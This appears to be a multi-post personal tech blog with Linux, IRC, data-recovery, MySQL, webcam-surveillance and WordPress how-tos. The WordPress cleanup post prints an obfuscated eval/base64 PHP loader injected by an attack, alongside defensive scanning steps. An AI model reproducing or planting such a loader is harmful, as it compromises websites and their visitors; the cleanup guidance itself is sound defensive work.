
Sync servers using multiple streams with LFTP

If you have a remote server with a directory you want to sync, you can use rsync, for example. However, rsync does not offer multi-stream syncing and can be slow when there are many new files. The solution below uses lftp with 5 parallel download streams, and each stream is split into 10 separate segments. This helps a lot when you cannot saturate your download connection with the regular methods, provided the uploading server has enough bandwidth.

#!/bin/bash
# Change these values for your setup (note that credentials on the command line
# are visible to other local users via ps; lftp can also read them from ~/.netrc)
login=your_username
pass=your_password
host=sftp://download.redoem.com
remote_dir=/media/files/redoem/dir
local_dir=/home/redoer/downloads
lock=/tmp/syncserver.lock

# remove the lock file if the script is interrupted
trap 'rm -f "$lock"' SIGINT SIGTERM
if [ -e "$lock" ]
then
 echo "Syncserver is running already."
 exit 1
else
 touch "$lock"
 # -P5: 5 files in parallel; use-pget-n 10: each file fetched in 10 segments
 # -c: continue partial files; --newer-than: only files changed recently
 lftp -u "$login,$pass" "$host" << EOF
 set ftp:ssl-allow yes
 set mirror:use-pget-n 10
 mirror -c -P5 --newer-than=now-15min --log=syncserver.log $remote_dir $local_dir
 quit
EOF
 rm -f "$lock"
 trap - SIGINT SIGTERM
 exit 0
fi

The above sample should work for most cases; you only need to change the values of the variables at the top of the script.

The --newer-than=now-15min part can be changed depending on how old the files you want to sync are. For example, if you last synced 4 hours ago and the new files arrived within the last hour, change it to now-60min or more (but less than 4 hours in this example) so that ONLY the new files are downloaded.

If you want to upload from your local machine to the remote server instead, replace the mirror line with the following (-R reverses the direction, and the source and destination directories are swapped):

 mirror -R -c -P5 --newer-than=now-15min --log=syncserver.log $local_dir $remote_dir

Now save the above as a .sh file, for example syncserver.sh, and add it as a cron job that runs every 15 minutes (or run it by hand when you have new files):

*/15 * * * * /home/redoer/syncserver.sh >> /home/redoer/sync_cron.log 2>&1
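As an added example that is not part of the original post: the touch-based lock above has a small window in which two cron runs started at the same moment both see "no lock", and a run killed with SIGKILL (or a reboot) leaves a lock behind that no trap can remove. The wrapper below uses an atomic mkdir lock with stale-lock detection; it assumes only bash/sh and coreutils, and the lftp command from the post is passed in as the command to run.

```shell
#!/bin/bash
# Added example (not from the original post): cron-safe locking for the sync.
# Assumes bash/sh and coreutils only; the lock directory path is an assumption.

LOCKDIR="${LOCKDIR:-/tmp/syncserver.lock.d}"

acquire_lock() {
  # mkdir is atomic: it either creates the directory or fails, with no
  # check-then-create gap, so at most one caller can win.
  if mkdir "$LOCKDIR" 2>/dev/null; then
    echo "$$" > "$LOCKDIR/pid"
    return 0
  fi
  # The lock already exists: if the recorded owner is still alive, give up;
  # otherwise the lock is stale (owner died without cleaning up), reclaim it.
  owner=$(cat "$LOCKDIR/pid" 2>/dev/null)
  if [ -n "$owner" ] && kill -0 "$owner" 2>/dev/null; then
    return 1
  fi
  rm -rf "$LOCKDIR"
  mkdir "$LOCKDIR" 2>/dev/null && echo "$$" > "$LOCKDIR/pid"
}

release_lock() {
  rm -rf "$LOCKDIR"
}

run_locked() {
  # Returns 75 (EX_TEMPFAIL) when another sync is running, else the command's status.
  acquire_lock || { echo "Syncserver is running already." >&2; return 75; }
  # EXIT fires on normal exit, on set -e failures and after INT/TERM, so the
  # lock cannot outlive the run unless the process is killed outright.
  trap release_lock EXIT INT TERM
  "$@"
  rc=$?
  release_lock
  trap - EXIT INT TERM
  return "$rc"
}

# Usage in the post's script: the heredoc given to run_locked is inherited by lftp.
#   run_locked lftp -u "$login,$pass" "$host" << EOF
#   set ftp:ssl-allow yes
#   set mirror:use-pget-n 10
#   mirror -c -P5 --newer-than=now-15min --log=syncserver.log $remote_dir $local_dir
#   quit
#   EOF
```

kill -0 only reports a process as alive when the caller may signal it, so keep the cron job and any manual runs under the same user.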

ZNC in a DigitalOcean droplet

It is nice to have an IRC connection that is always available and that doesn’t expose your home IP address. With a ZNC setup you can use your local IRC client (BitchX, irssi, HexChat etc.) to connect to the ZNC, and you will see all the networks and channels it is connected to. This tutorial explains how to set up ZNC on a $5/month DigitalOcean droplet (ref link) with Ubuntu 16.04.1. Of course this setup should work on any hosting; DigitalOcean is just given as an example here.

Create a Droplet

1. Press the Create a Droplet button once you are logged in to your DO account

  • Select the OS image (Ubuntu 16.04.X), the Droplet size/price ($5/mo), the data center region, any extra features, and an SSH key if you want that extra security, then press Create Droplet

2. Log in to your Droplet (box) and make sure everything is up to date:

sudo apt-get update
sudo apt-get upgrade

Installation and Build of ZNC

1. Grab a few essentials that are needed to compile ZNC from source:

sudo apt-get install build-essential libssl-dev libperl-dev pkg-config

2. Grab the latest ZNC source tarball:

cd /usr/local/src; sudo wget http://znc.in/releases/znc-latest.tar.gz

3. Extract the package and enter the directory:

sudo tar -xzvf znc-latest.tar.gz; cd znc*

4. Configure the source system-wide (use ./configure --prefix=$HOME/znc if you don’t want a system-wide install):

./configure

5. Then compile and install ZNC (this might take a few minutes):

sudo make; sudo make install

Configuration of ZNC

1. Create a new user that ZNC will run as:

adduser znc-admin

2. Switch to the new user (a login shell starts in its home directory):

su - znc-admin

3. Start ZNC and its configuration wizard:

/usr/local/bin/znc --makeconf

4. Below is a sample configuration (ZNC version 1.6.4). The values I typed are shown after the prompts; wherever an answer is left empty, the default shown in the brackets [ ] is used.

[ .. ] Checking for list of available modules...
[ >> ] ok
[ ** ] 
[ ** ] -- Global settings --
[ ** ] 
[ ?? ] Listen on port (1025 to 65534): 14125
[ ?? ] Listen using SSL (yes/no) [no]: yes
[ ?? ] Listen using both IPv4 and IPv6 (yes/no) [yes]: yes
[ .. ] Verifying the listener...
[ >> ] ok
[ ** ] Unable to locate pem file: [/home/znc-admin/.znc/znc.pem], creating it
[ .. ] Writing Pem file [/home/znc-admin/.znc/znc.pem]...
[ >> ] ok
[ ** ] Enabled global modules [webadmin]
[ ** ] 
[ ** ] -- Admin user settings --
[ ** ] 
[ ?? ] Username (alphanumeric): redoEm
[ ?? ] Enter password: 
[ ?? ] Confirm password: 
[ ?? ] Nick [redoEm]: 
[ ?? ] Alternate nick [redoEm_]: 
[ ?? ] Ident [redoEm]: 
[ ?? ] Real name [Got ZNC?]: Redo'Em
[ ?? ] Bind host (optional): 
[ ** ] Enabled user modules [chansaver, controlpanel]
[ ** ] 
[ ?? ] Set up a network? (yes/no) [yes]: 
[ ** ] 
[ ** ] -- Network settings --
[ ** ] 
[ ?? ] Name [freenode]: 
[ ?? ] Server host [chat.freenode.net]: 
[ ?? ] Server uses SSL? (yes/no) [yes]: 
[ ?? ] Server port (1 to 65535) [6697]: 
[ ?? ] Server password (probably empty): 
[ ?? ] Initial channels: #redoEm
[ ** ] Enabled network modules [simple_away]
[ ** ] 
[ .. ] Writing config [/home/znc-admin/.znc/configs/znc.conf]...
[ >> ] ok
[ ** ] 
[ ** ] To connect to this ZNC you need to connect to it as your IRC server
[ ** ] using the port that you supplied. You have to supply your login info
[ ** ] as the IRC server password like this: user/network:pass.
[ ** ] 
[ ** ] Try something like this in your IRC client...
[ ** ] /server <znc_server_ip> +14125 redoEm:<pass>
[ ** ] 
[ ** ] To manage settings, users and networks, point your web browser to
[ ** ] https://<znc_server_ip>:14125/
[ ** ] 
[ ?? ] Launch ZNC now? (yes/no) [yes]: 
[ .. ] Opening config [/home/znc-admin/.znc/configs/znc.conf]...
[ >> ] ok
[ .. ] Loading global module [webadmin]...
[ >> ] [/usr/local/lib/znc/webadmin.so]
[ .. ] Binding to port [+34125]...
[ >> ] ok
[ ** ] Loading user [redoEm]
[ ** ] Loading network [freenode]
[ .. ] Loading network module [simple_away]...
[ >> ] [/usr/local/lib/znc/simple_away.so]
[ .. ] Adding server [chat.freenode.net +6697 ]...
[ >> ] ok
[ .. ] Loading user module [chansaver]...
[ >> ] ok
[ .. ] Loading user module [controlpanel]...
[ >> ] ok
[ .. ] Forking into the background...
[ >> ] [pid: 19576]
[ ** ] ZNC 1.6.4 - http://znc.in

That is it – ZNC is now up and running!

Connect to ZNC with your local IRC Client

Now find the IP address of your Droplet and set up your IRC client to connect to it.

Example with HexChat:

After connecting to the ZNC all the networks and channels you have added will appear.

Enable higher screen resolution in VirtualBox (for Ubuntu)

This might work on other systems too; I tried it on Ubuntu 14.04.1.

In VirtualBox the screen for Ubuntu was very small and it was difficult to see what’s on the screen. To fix this issue, you need to install the following packages on the guest (VM) box:

sudo apt-get install virtualbox-guest-dkms virtualbox-guest-x11

If you get this error:

The following packages have unmet dependencies. virtualbox-guest-x11 : Depends: xorg-video-abi-15

you will need to remove this package (note: I am not sure what all this removes, it was a lot, so use caution):

sudo apt-get remove libcheese-gtk23

Then install these:

sudo apt-get install xserver-xorg-core-lts-trusty

and:

sudo apt-get install xserver-xorg-core

Then try to install the VirtualBox packages again, as in the first step:

sudo apt-get install virtualbox-guest-dkms virtualbox-guest-x11

Once they install properly, restart the VM and the screen should be a normal size. You might need to increase the display memory in VirtualBox before starting the VM.

Recover data from a damaged hard disk drive

I would like to begin this presentation by first stating that I am not an electronic technician. Nor do I have any more than a very basic understanding of hard disk drive technology. I have a basic understanding of computer technology and of electricity. You do not have to be uber skilled to do what I did.

I successfully retrieved lost data from a dead hard disk drive for a few cents more than $100. I had been quoted $590 and up by professional data recovery firms to do what I did. The following presentation is a brief summary of what I did and how it worked. I cannot guarantee it will work for everyone. I can advise you to be very careful if you try to do any of the things that I did because it is possible that you can so badly corrupt your drive that any data on it might be lost forever.

Before you begin, do what you are doing right now. That is, go on the Internet and read, read, read and then read some more.

BACKGROUND

The disk drive was accidentally exposed to water. The water caused the printed circuit board to malfunction. My friend, the owner of the drive, replaced it and gave it to me to try to recover his data if I could. The arrangement was that I could keep the drive in exchange for any data I might be able to recover from it.

My preliminary assessment was that the data was most probably intact. The platters had never been opened or exposed to air in any way. The printed circuit board was the only part of the drive that had been damaged as a result of the accident. I wrongly assumed that I could simply “hot swap” the circuit board that had stopped working for another one from some other drive.

The disk drive details:

Brand: Hitachi
HDD: 5K250-250
Model: HTS542525K9SA00
RPM: 5400
Power: 5v 700mA DC
Capacity: 250GB
Type: SATA
P/N: 0A54876
MLC: DA2010

Complete 2.5″ HDD, PCB has been unscrewed

I have a source locally who is involved in dismantling and recycling computers of all kinds. He advised me that from time to time he gets small SATA drives and has to drill a hole in them to ensure that no data can ever be retrieved from any of them. However, he told me that would not stop him from giving me the printed circuit boards if I wanted them.

But when I told him about my project to recover data he told me that he was uncertain why but he was pretty sure that I could not simply hot swap boards between drives with any hope of retrieving data or resurrecting a dead drive. That opinion was further substantiated by another friend who provided me with the following Internet link to the HDD Guru Forum.

ACTUAL REPAIR PROCEDURE

The article on HDD Guru is also a basic primer that explains why it is not possible to simply hot swap one printed circuit board for another when trying to recover data. The key to understanding that is a thing called the NVRAM or the Non-Volatile Random Access Memory chip. While it would appear that two identical drives have identical circuit boards attached to them that is not totally true. It is true that the boards themselves do operate identically and removing one and replacing it with the other is a piece of cake involving a few tiny screws and some careful physical work.

PCB only, NVRAM removed and placed on top of another chip with scotch tape to avoid losing it

But the individual boards are unique in as much as all of the information about the specific hard disk drive is stored within the NVRAM chip. So while the boards will physically move from one drive to the next they will not operate unless the NVRAM chip is moved as well.

The above article includes two photos of the kind of printed circuit board I worked with including a highlighted diagram of where to find the NVRAM chip.

The first problem I addressed was moving that chip. From a casual glance at the dead drive that I had I knew that there was no way that I could ever dream of doing that type of board level electronic work. But here where I live I am familiar with a TV repair shop that has done circuit board work for me in the past when they removed and reinstalled IC circuit chips in an old Sony TV I owned.

I consulted the technician in that shop and he said that moving the NVRAM, which is basically an 8-legged EPROM or an Erasable Programmable Read Only Memory device, is an easy procedure. The NVRAM performs so that once it has been programmed the information contained in it remains non-volatile. So no matter if the power is turned on or off the data remains safe. The technician I spoke with in the TV shop advised me that he has to move those kinds of chips all of the time. It seems that in modern electronics often the new replacement part is unusable unless the original EPROM chip is removed from the old part and then soldered onto the new part. He estimated the labor cost for moving my NVRAM at $25.

The next problem I encountered was finding a donor drive. As I began this discussion I will remind you that I don’t have detailed hard disk drive knowledge. So I was kind of shooting in the dark. On the HDD GURU forums there are various discussions authored by learned individuals who speak of the various characteristics that must be matched between circuit boards. But given the gamble I was taking I determined to set my own standards as I attempted to match a donor drive to my dead drive.

I first determined that the physical description of the two drives had to match exactly (Hitachi, HDD: 5K250-250, Model: HTS542525K9SA00). Next I decided that the part numbers for the printed circuit boards should also match, because that would ensure that the two boards would physically interchange with each other (P/N 0A54876). Finally, I decided that the MLC should also match (DA2010). I know that experienced technicians might suggest that there are other boards which would also interchange, but I determined to play it safe and apply my own personal standards in selecting my donor drive.

I also note that there are other characteristics between my donor drive and my dead drive that did not match. There are a variety of numbers on both the hard disk drive enclosure as well as the two PCBs that do not match. I don’t know what those numbers mean but I assumed that if the basic information like the size of the drive, the numbers of heads, the speed, the voltage, the number of cylinders etc. all matched then the two boards would probably interchange. I also noted that if the model numbers, pin numbers, and MLC numbers matched those other characteristics should also match.

Finally, I needed a USB, SATA, hard disk drive enclosure in order to have a way to attach the repaired disk drive to my computer. There are countless numbers of them on the market and I bought mine for less than $10 from Amazon. Enough said.

When I was finally able to locate a donor drive, my cost was $55 plus freight. When it arrived, the very first thing I did was record all of the characteristics of the two drives and the two PCBs so that they would not become confused during the exchange process. I then carefully removed the individual PCBs using the standard static precautions employed in handling any electronic circuitry. Basically you should not touch the PCB except by the edges, but there are many places on the internet that can help you understand the precautions in dealing with electrostatic discharge and how it can ruin a printed circuit board.


Bare HDD, no PCB

After I delivered the two printed circuit boards to the TV shop technician, I waited about a week to get them back. I advised the technician to retain the donor NVRAM as I supposed that if my experiment failed I could at least put it back and have one functional hard disk drive. But my concerns were unfounded. He was able to successfully exchange the NVRAM that matched my dead drive with the one that was on the donor drive PCB. When I swapped out my dead PCB with the donor PCB that now had my NVRAM chip soldered onto it, everything worked perfectly.

RECAP

Just to recap exactly what I did, I had a dysfunctional hard disk drive printed circuit board which had on it the NVRAM which had all of my disk drive’s data in it. I also had a printed circuit board which was functional but which had on it an NVRAM that contained data about that other hard disk drive. I had the technician exchange the two NVRAM chips so that the functional printed circuit board now had on it my data’s NVRAM chip.

For me the work involved finding a functional drive that matched, and then carefully removing the two circuit boards and safely packing them into electrostatic bags to deliver to the TV technician.

I was able to recover all of the lost data off of my friend’s hard disk drive. The drive functions perfectly and I am actually considering installing it in my laptop as it has a greater capacity than the drive I am currently using.

The final cost for the whole operation totaled just a bit more than $100. The expenses were as follows:

USB SATA hard disk drive enclosure ........ $  5.58
Used Hitachi donor drive .................. $ 55.00
Shipping for above ........................ $  6.00
TV technician labor fees .................. $ 35.00

Total charges ............................. $101.58

This was a guest post by TJD.

Recover MySQL root password on Linux and Windows

It happens that sometimes (after 2 days 🙂 ) you forget the password for your root user on MySQL. Well, there are a few steps you can perform to recover it.

This was performed on version:

$ mysql -V
mysql  Ver 14.14 Distrib 5.1.61, for debian-linux-gnu (x86_64) using readline 6.2

The following steps need to be performed as root user, so either login with it or use sudo.

Step 1: Stop the MySQL service

$ sudo /etc/init.d/mysql stop

Step 2: Start the MySQL server without password checks

$ sudo mysqld_safe --skip-grant-tables &

Step 3: Connect to the MySQL server using the MySQL client

$ sudo mysql -u root

Step 4: Change the password for the root user

mysql> use mysql;
Database changed
mysql> update user set password=PASSWORD("YOUR_NEW_PASS") where user = 'root';
Query OK, 3 rows affected (0.01 sec)
Rows matched: 3  Changed: 3  Warnings: 0
mysql> flush privileges;
Query OK, 0 rows affected (0.00 sec)
mysql> quit
Bye

Step 5: Stop the MySQL server again

$ sudo /etc/init.d/mysql stop

Step 6: Start the MySQL server (normally) and test the new password

$ sudo /etc/init.d/mysql start
$ sudo mysql -u root -p


This should also work on Windows; you will just need to use different commands to start and stop the MySQL daemon.


Surveillance system with Motion

There are times when you leave your home empty and you don’t have an expensive security and alarm system, but you still want to know about any changes or visits you did not approve of while you were gone. There is an easy way to achieve just that with Motion. What you need is:

  1. Linux OS (ex. Ubuntu)
  2. Motion (free)
  3. Webcam
  4. Internet (optional)
  5. Hosting (optional)
  6. Smartphone with data plan (optional)

After you have your computer ready and the webcam installed and working, download Motion from the project site or use Ubuntu’s apt to get it (check that you get the latest version):

sudo apt-get install motion

Run Motion with root privileges (sudo motion). Note that you should probably start it with sleep or cron; otherwise it activates immediately and will most likely record you as you leave the room.

Now you are all set for basic surveillance with just a webcam that records whenever there is movement in front of the camera. There are, however, some more advanced options that can help a lot.

Email you when there is movement detected

For this you will need to install sendmail and mutt, assuming you are on Ubuntu:

sudo apt-get install sendmail mutt

The basic settings for sendmail are enough for most users, but if you are an advanced user feel free to modify it as you desire.

Open the file /etc/motion/motion.conf in your favorite text editor (e.g. vim), locate the on_event_start setting and change its value to:

echo "This is the body of the message" | mutt -s "Motion has been detected" your@mail.com

If there is a ; (semicolon) at the beginning of the row, remove it, along with any empty space before on_event_start.

Sending images to a webserver

It is useful to have the images Motion takes copied to a webserver, so that you can check from a remote location what is on them and report to the police if needed.
Open the /etc/motion/motion.conf file again in a text editor, locate the on_picture_save setting and change its value to:

scp %f user@yourdomain.com:/path/for/images/

If there is a ; (semicolon) at the beginning of the row, remove it, along with any empty space before on_picture_save.

Enable login without password on your webserver

You need to create an SSH key on your machine with the following:

sudo ssh-keygen -t dsa

Upload the key to your webserver:

sudo ssh-copy-id -i /root/.ssh/id_dsa.pub user@yourdomain.com

Tips and tricks: if your camera has an LED light, put a piece of plastic electrician’s tape (insulating tape) over it so that the camera is not noticeable. Also, make sure there is some light in the room, unless the camera has a night vision feature.

Making rounded corners in GIMP

I struggled a little to create an image in GIMP with rounded corners. I tried the selection tools and everything else I could think of, to no avail. Then I browsed through the Filters menu and found the script Round Corners. The image I created initially looked like this (you can also import a picture):

It looks kind of dull and boring, so now we will give it round edges and make it more interesting 🙂

Click on the Filters -> Decor -> Round Corners… and a new window with settings will be shown.

NOTE: if the Round Corners filter is grayed out and you cannot select it, it means that the image has an alpha channel, which you need to remove first. Go to Layer -> Transparency -> Remove Alpha Channel

The window with the settings should look like this:

The default settings might not work for everybody, so test how they transform the image and what you need.

The options are pretty much self-explanatory: for example, if you do not want any shadows just set the Shadow X/Y offset to 0; Work on copy creates a new file and does not modify the original; Add Background puts the new image on a background, etc.

The default settings generate an image like this:

You can see the rounded edges, the shadow, the blur on the shadow and the background (white). Now the image looks much slicker and more modern.

Let me know if you have questions about this in the comments below.

Change default search engine in Firefox (in address bar)

The default search engine in Firefox is Google. There is a way to change it to whichever search engine you wish. In this post I will talk about switching the default search from Google to DuckDuckGo. I am experimenting with DDG now to see if it suits my needs better than Google.

Instant Search

For the instant search box you can easily add new search engines or select one on the go; there is even a GUI that helps you add new ones, and remove and edit them.

When you are on a website that offers search services, you will see a new entry “Add <site>” in the instant search list of engines; click it and the engine is added automatically. So visit https://www.duckduckgo.com/ now to add it if you wish.

Default Search in Address Bar

The default search is in the address bar: instead of typing a URL, you type a search query and hit enter. The query is then passed to your default search engine and the results are displayed on its website.

There is a way to modify the default search engine in Firefox. Start by typing this in the address bar:

about:config

Agree to the warning and enter the following in the search field:

browser.search.defaultenginename

It should show one row, and the Value field should be Google. Double click on it and enter the name of your desired default search engine (in this case DuckDuckGo).

Click OK and you are good to go.

Note: the search engine that you want to make your default must already be in the Instant Search list.

This is good for productivity if you use multiple search engines: you can set one as the default and search faster without distractions.

How to clean malware infected WordPress blogs

Yes, that happened to me. I had a pretty old version of WordPress on one website and it got attacked by somebody. From what I could tell it was an automated attack, and it infected most of the .php files belonging to the same user on the hosting.

I found out about it when I opened the website in Chrome and a warning was shown instead of the website:


Note: you can also perform a free scan via Sucuri, which will confirm whether your website is infected and also offers ways to clean it up.

The following will be reported if infected:

Don’t panic, investigate!

The first thing I did was panic. After panicking for ~5 minutes I realized that I should calm down and start investigating the issue and how many of my websites were affected. I opened all of them in Chrome and only 3 were infected. I opened the source code to see what the code causing the problem looked like. Note: DO NOT OPEN THE INFECTED LINK, it will infect your machine (especially if you are on Windows).

The code was a path to the infected website enclosed in <script> tags. Nothing was shown in Firefox, though, which is why I didn’t see the problem earlier. I assume Firefox has some built-in protection against scripts from external hosts.

The next step was to open the .php files on my server and look for the code that produces the script tag pointing to the external website. It was at the top of the file and it was a base64 encoded string, which looked like this:

/**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYJF9TRVJWRV
JbJ21yX25vJ10pKXsgICRfU0VSVkVSWydtcl9ubyddPTE7ICAgIGlmKCFmdW5jdGlvbkk5Y3VybF83
NzcoJHVybCk50ZW50IT09ZmFsc2UpcmV0dXJuICRjb250ZW50OyRjb250ZW50PUB0cnlmb3Blbl8Nz
coJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9zb2NrBlb
l83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRy2tl
dF83NzcoJHVybCk7aWYoJbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7cmV0dXJuICgIGZ1bmNttr
0aW9uIHRyeWN1cmxKCR1cmwpe2lmKGZas1bmN0aW9uXsf2V4aXN0cygnY3Vybyk9PT1mYWxzZSlyZX
R1cm4gZmFsc2U7JGNoID0gYl0ICgpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVVJMLCR1cmwpO
2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpO2N1cmxfc2V0b3B0ICg
VUkxPUFRfVElNRU9VVCwgNSk7Y3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOyRyZ
XN1bHQgPSBjdXJsX2V4ZWMgKCRjaCk7Y3VybF9jbG9zZSgkY2gpO2lmICgkcmVzdWx0PT0iIilyZXR
1cm4gZmFsc2U7cmV0dXJuICRyZXN1bHQ7fSAgZnVuY3Rpb24gdHJ5ZmlsZV83NzcoJHVybCl7aWYoZ
nVuY3Rpb25fZXhpc3RzKCdmaWxlJyk9PT1mYWxzZSlyZXR1cm4gZmggsdaefhyjhEgsrrgmV0dXJuI
CRidWY7fSAgZnVuY3Rpb24gdHJ5Zm9wZW5fNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnZm9
wZW4nKT09PWZhsfaXJldHVybiBmYWxzZTskYndfsdyRmPUBmb3BlbigkdXJsLCdyJyk7aWYgK"));?>

If you are on a Linux machine or have Cygwin installed, you can decode the string and see what it actually does with the following command:

echo "ABOVE STRING GOES HERE" | base64 -d

echo is used so that the decoded code is only printed, never executed by mistake.

Make backups

Now that we know what the issue is, make a backup of the website and the database. Don’t worry that the files are still infected; better to have infected files than no files at all in case something terrible happens 🙂

Unless you already have a method for frequent backups, use a simple method now. Delete all unwanted themes and plugins, empty the cache if you use a caching plugin, then log in to your hosting (S/FTP) and copy all the files from your host to your local machine. Log in to your database and create a full export of your database schema.

Clean-up

Unless you got Sucuri to perform the cleaning for you, these are some manual steps you can perform to clean your website.

1. Install a plugin to scan

There is a plugin called Exploit Scanner that scans your WordPress installation. It works on WordPress 3.3+, so if you have something older you will need to skip this step. If you have 3.3+, install it and perform a scan (in most cases the default settings are good); it will tell you which files are (most likely) infected. There will be some legitimate decode/eval functions in the code, so check specifically for the ones wrapping base64 encoded strings (as explained above).

When the scan is complete you can see which files are infected and then correct them manually.

2. Manually scan all the files

If you are on a Linux machine or have Cygwin on Windows, you can run the following to identify which files are infected (-type f skips directories, and -print0/-0 keep file names with spaces intact):

cd backedup_folder_from_above
find . -type f -print0 | xargs -0 grep -il decode

This prints all the files that contain the word decode, and you will recognize the infection by the base64 encoded string at the top of the file. If you are not sure about some files, you can always check the encoded string with the echo method explained above.

3. Manually remove the infected code

Now that we have identified which files are infected (either with the plugin or the manual scan), it is time to clean up the website. Modify the infected files by deleting the malware lines, in the example above everything from /**/ to the closing php tag after the encoded string. If you modify the local copies on your computer, you need to upload them to the server at the correct paths when you are finished and overwrite the existing files. An easier way is to open the files directly from the server (via your FTP client), modify them and save the changes.

When you are done with all the files and they are successfully uploaded to your server, perform another scan with Exploit Scanner and/or the manual scan (note: for this second scan you need to create a new backup of the entire website in a new location and scan there). Make sure there are no infected files left.

Final steps

Now that the site is clean there are some final steps that must be performed so that you avoid problems like this in the future.

  1. Update your WordPress installation to the latest version
  2. Update all your plugins, or at least the active ones
  3. Update your theme (please note: some themes overwrite all your custom code when updated)
  4. Change your WordPress secret keys in your wp-config.php file
  5. Change the passwords for all the users in WordPress and make sure no new users have been created
  6. Change the password(s) on your database, and change the password in wp-config.php as well
  7. Make sure the .htaccess file in the root directory of your blog has not been modified. Unless you have modified it yourself, it should look like this:
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

Note: there could be something else added by your hosting, plugins etc., so double check before modifying it.

After you have done all these steps, go to Sucuri again and re-scan your site to make sure that everything is gone. If you are clean you should see something like this:
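As an added example (not code from the original post), here is a read-only scanner that automates the two checks above: the manual "grep for decode, then decode the string with echo | base64 -d" step, and the comparison of .htaccess against the stock WordPress block. It only decodes the payload so a human can read it and never evaluates it; all file contents are constructed for the demo.

```python
"""Added example, not from the original post: find eval(base64_decode("...")) loaders
in a backup copy of a site and decode them for reading, plus a check that .htaccess
still holds only the stock WordPress block.  All sample files are constructed."""
import base64
import binascii
import re
from typing import Dict, List, Tuple

# The loader shape shown in the post: eval(base64_decode("<base64>")), where the
# base64 string may be wrapped across several lines inside the quotes.
EVAL_B64 = re.compile(
    r'''eval\s*\(\s*base64_decode\s*\(\s*["']([A-Za-z0-9+/=\s]+)["']\s*\)\s*\)''',
    re.IGNORECASE,
)


def decode_payload(b64: str) -> str:
    """Decode like `echo ... | base64 -d` would: drop whitespace, repair missing
    padding, and return readable text.  The result is never executed."""
    clean = re.sub(r"\s+", "", b64)
    clean += "=" * (-len(clean) % 4)
    try:
        return base64.b64decode(clean).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return "<undecodable base64>"


def scan_file(path: str, text: str) -> List[Tuple[str, int, str]]:
    """Return (path, line_number, decoded_preview) for every eval/base64 loader."""
    hits = []
    for m in EVAL_B64.finditer(text):
        line_no = text.count("\n", 0, m.start()) + 1
        hits.append((path, line_no, decode_payload(m.group(1))[:80]))
    return hits


def scan_tree(files: Dict[str, str]) -> List[Tuple[str, int, str]]:
    """Scan a {path: contents} map (stand-in for walking the backed-up folder).
    Plain base64_decode() calls without eval() are not reported."""
    return [h for path, text in sorted(files.items()) for h in scan_file(path, text)]


# The stock WordPress .htaccess block quoted in the post, used as the reference.
DEFAULT_HTACCESS = """# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress
"""


def htaccess_is_default(text: str) -> bool:
    """True when .htaccess contains exactly the stock block (ignoring blank lines
    and trailing spaces), i.e. nothing has been appended or rewritten."""
    def norm(s: str) -> List[str]:
        return [ln.rstrip() for ln in s.strip().splitlines() if ln.strip()]
    return norm(text) == norm(DEFAULT_HTACCESS)


# --- constructed sample site (not real malware; a harmless PHP fragment) ----
_INJECTED = base64.b64encode(b'if(function_exists("curl_init")){ /* demo */ }').decode()
SAMPLE_SITE = {
    "index.php": "<?php\n/**/ eval(base64_decode(\"" + _INJECTED[:30] + "\n"
                 + _INJECTED[30:] + "\"));?>\n<?php require 'wp-blog-header.php';\n",
    "wp-includes/clean.php": "<?php\n// legitimate decode with no eval around it\n"
                             "$img = base64_decode($data);\n",
    ".htaccess": DEFAULT_HTACCESS + "\nRewriteRule ^ http://example.invalid/ [R,L]\n",
}

if __name__ == "__main__":
    for path, line, preview in scan_tree(SAMPLE_SITE):
        print(f"{path}:{line}: {preview}")
    print(".htaccess is stock:", htaccess_is_default(SAMPLE_SITE[".htaccess"]))
```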

That would be all; now go and write some posts on your clean blog 🙂

Restore files in Windows 7

If you happen to be using Windows 7 and you delete a file by mistake (or change your mind 😉 ), there is an easy way to restore it.

  1. Go to the folder that has the file
  2. Right click in it (on the empty surface, not on an icon)
  3. Click Properties
  4. Click the tab called Previous Versions
  5. Locate the file that you want to restore

These versions are created when Windows makes System Restore points, so you might want to adjust those settings if you are a more advanced user. By default they are created on every restart, at certain times of the day, after installing an application, etc.

The same can be done for a file that has been modified but is still present:

  1. Right click on the file
  2. Select Properties
  3. Click the Previous Versions tab
  4. Select the version you want to restore

This restore procedure works on all kinds of files: database files, Word documents, text files, images etc.
